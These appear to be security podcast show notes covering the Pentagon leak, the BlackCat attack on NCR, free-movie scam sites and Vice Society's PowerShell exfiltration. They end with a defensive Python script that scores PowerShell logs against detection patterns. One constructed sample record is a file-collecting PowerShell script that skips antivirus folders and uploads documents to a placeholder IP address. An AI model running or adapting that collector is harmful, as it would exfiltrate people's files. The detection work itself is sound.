Episode 53: April 17 2023
Links
https://www.axios.com/2023/04/10/what-we-know-pentagon-document-leak
https://securityaffairs.com/144866/cyber-crime/ncr-blackcat-alphv-ransomware.html
https://cyberwarzone.com/beware-of-movie365-and-similar-sites-offering-free-movies-online/
https://thehackernews.com/2023/04/vice-society-ransomware-using-stealthy.html
Pentagon Document Leak
- Documents
- Various social media sites
- Telegram
- Documents leaking at least since January.
- Discord
- 4Chan
- Leaker
- Jack Teixeira
- 21 y/o
- North Dighton, Massachusetts.
- Massachusetts Air National Guard
- Arrest
- in connection with “unauthorized removal, retention and transmission of classified national defense information”
- Discord Members
- suspicious of law enforcement and the U.S. intelligence community
- prone to ranting about “government overreach,”
- Leak
- photos of crumpled pieces of paper
- laid on top of magazines.
- or surrounded by household objects.
- leaked documents number roughly 100 pages
- The documents illustrate U.S. efforts to spy on Ukraine’s government and military leaders.
- lays out the U.S.’ extensive knowledge of Russian government intelligence.
- could hurt U.S. spy efforts if Russia figures out where the information is coming from.
- DLP?
NCR was the victim of the BlackCat ransomware gang.
- NCR Corporation
- software, consulting and technology company providing several professional services and electronic products.
- manufactures self-service kiosks, point-of-sale terminals, automated teller machines, check processing systems, and barcode scanners.
- Outage
- Wednesday
- DFW05 datacenter
- outage on its Aloha point of sale platform
- restaurant point-of-sale and management software
- notified law enforcement and engaged third-party cybersecurity experts.
- investigate the incident and determine the scope of the attack.
- restaurants impacted are still able to serve their customers
- impacted a specific functionality.
- BlackCat/ALPHV
- Mandiant tracks an ALPHV affiliate as UNC4466
- Since November 2021
- added NCR to the list of victims on its Tor data leak site
- Dominic Alvieri, a cybersecurity researcher, published a chat message from the negotiation between NCR and the ransomware gang.
- removed the name of NCR from its leak site
- probably because of an ongoing negotiation.
Free Movie Sites are a bad idea
- Movies 365
- promise access to the latest movies
- How they work
- designed to lure users
- make money by hosting forms and advertisements
- possible malware
- collecting personal information from users
- ask users to complete a survey or enter their email address or phone number
- sold to third-party advertisers
- Don’t. Just don’t.
Vice Society Ransomware Using Stealthy PowerShell Exfiltration
- Vice Society
- Microsoft tracks as DEV-0832
- extortion-focused
- May 2021
- New Tool
- bespoke PowerShell
- avoids detection
- living off the land binaries and scripts
- no need to bring in external tools
- automate exfil
- ps1
- identifying mounted drives
- recursively searching through each of the root directories
- focus on files over 10 KB
- only files whose extensions and directories match its include list
- Excludes
- system files, backups, and folders pointing to web browsers
- folders belonging to security solutions from Symantec, ESET, and Sophos
- Utilizes multi-processing and queuing
- ensures it does not consume too many system resources
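The behaviour outlined above (drive enumeration, recursive search, a size floor, an extension include list, path and AV-vendor exclusions, queued processing, and an upload step) is also a detection opportunity if PowerShell ScriptBlock logging (Event ID 4104) is enabled. The script below is an added example of a weighted-indicator triage over 4104 records; it is not Vice Society's tool and not a Microsoft or vendor rule. The indicator regexes, weights, and threshold are assumptions to be tuned against your own ScriptBlock baseline, and the three sample records are constructed (the upload target uses a TEST-NET documentation address).

```python
"""Heuristic triage of PowerShell ScriptBlock logging (Event ID 4104) records
for a living-off-the-land file discovery and exfiltration pattern.

Added example: not Vice Society's script, nor any vendor's detection rule.
Indicator patterns, weights and THRESHOLD are assumptions to tune locally;
SAMPLE_RECORDS below are constructed, not real telemetry.
"""
import re

# (indicator name, pattern, weight). Weights favour tells that are rare in
# admin scripts (naming AV vendors, uploading file contents) over generic ones.
INDICATORS = [
    ("drive_enum", r"Get-PSDrive|Get-(?:Wmi|Cim)(?:Object|Instance)\s+Win32_LogicalDisk|System\.IO\.DriveInfo", 2),
    ("recursive_search", r"Get-ChildItem[^\r\n]*-Recurse|System\.IO\.Directory\]::EnumerateFiles", 2),
    ("size_filter", r"\.Length\s*-g[te]\s*\d+", 1),
    ("path_exclusions", r"-notmatch|-notlike|-notin\b|-notcontains", 1),
    ("av_vendor_names", r"symantec|eset|sophos", 3),
    ("queue_or_parallel", r"Start-(?:Thread)?Job|ForEach-Object\s+-Parallel|RunspacePool|Collections\.Queue|ConcurrentQueue", 2),
    ("http_upload", r"Invoke-WebRequest|Invoke-RestMethod|\.Upload(?:File|Data|String)\(|Net\.Http\.HttpClient", 3),
]
COMPILED = [(name, re.compile(pat, re.I), w) for name, pat, w in INDICATORS]

# Document-style extensions; three or more distinct ones in one script block
# are treated as an "include list" (weight 1).
EXT_RE = re.compile(r"\b(docx?|xlsx?|pptx?|pdf|pst|sql|bak|txt|csv)\b", re.I)
THRESHOLD = 8  # assumption: tune so routine admin scripts stay below it


def score_script_block(text):
    """Return (score, [matched indicator names]) for one ScriptBlockText."""
    score, hits = 0, []
    for name, rx, weight in COMPILED:
        if rx.search(text):
            score += weight
            hits.append(name)
    exts = {m.lower() for m in EXT_RE.findall(text)}
    if len(exts) >= 3:
        score += 1
        hits.append("extension_include_list")
    return score, hits


def triage(records, threshold=THRESHOLD):
    """Return [(ScriptBlockId, score, hits)] for 4104 records at or above threshold."""
    flagged = []
    for rec in records:
        if rec.get("EventID") != 4104:
            continue
        score, hits = score_script_block(rec["ScriptBlockText"])
        if score >= threshold:
            flagged.append((rec["ScriptBlockId"], score, hits))
    return flagged


# Constructed sample records: two routine admin scripts and one that follows
# the collector pattern described in the notes.
SAMPLE_RECORDS = [
    {"EventID": 4104, "ScriptBlockId": "benign-largefiles", "ScriptBlockText":
     "Get-ChildItem -Path C:\\Logs -Recurse -File | Where-Object { $_.Length -gt 104857600 } | Sort-Object Length -Descending"},
    {"EventID": 4104, "ScriptBlockId": "benign-inventory", "ScriptBlockText":
     "$disks = Get-CimInstance Win32_LogicalDisk | Select-Object DeviceID, Size\n"
     "Invoke-RestMethod -Uri 'https://cmdb.example.internal/api/disks' -Method Post -Body ($disks | ConvertTo-Json)"},
    {"EventID": 4104, "ScriptBlockId": "suspect-collector", "ScriptBlockText":
     "$drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root\n"
     "$include = '\\.(docx?|xlsx?|pdf|pst|sql|bak)$'\n"
     "$exclude = 'Windows|\\$Recycle\\.Bin|Backup|Chrome|Firefox|Symantec|ESET|Sophos'\n"
     "$q = New-Object System.Collections.Queue\n"
     "foreach ($d in $drives) { Get-ChildItem -Path $d -Recurse -File -ErrorAction SilentlyContinue |\n"
     "  Where-Object { $_.Length -gt 10240 -and $_.Extension -match $include -and $_.FullName -notmatch $exclude } |\n"
     "  ForEach-Object { $q.Enqueue($_.FullName) } }\n"
     "$wc = New-Object System.Net.WebClient\n"
     "while ($q.Count -gt 0) { $wc.UploadFile('http://203.0.113.10/u', $q.Dequeue()) }"},
]

if __name__ == "__main__":
    for sb_id, score, hits in triage(SAMPLE_RECORDS):
        print(f"{sb_id}: score={score} hits={','.join(hits)}")
```

With the weights above the large-file hunt scores 3 and the inventory post scores 5 (drive enumeration plus an HTTP call is common in IT tooling), while the collector scores 15 because it combines every stage. The hits list is what an analyst needs in the alert: a single strong tell like naming three AV vendors in an exclusion list is worth more than any count of generic cmdlets, and a script that enumerates drives and uploads without the search and filter stages should stay below the line.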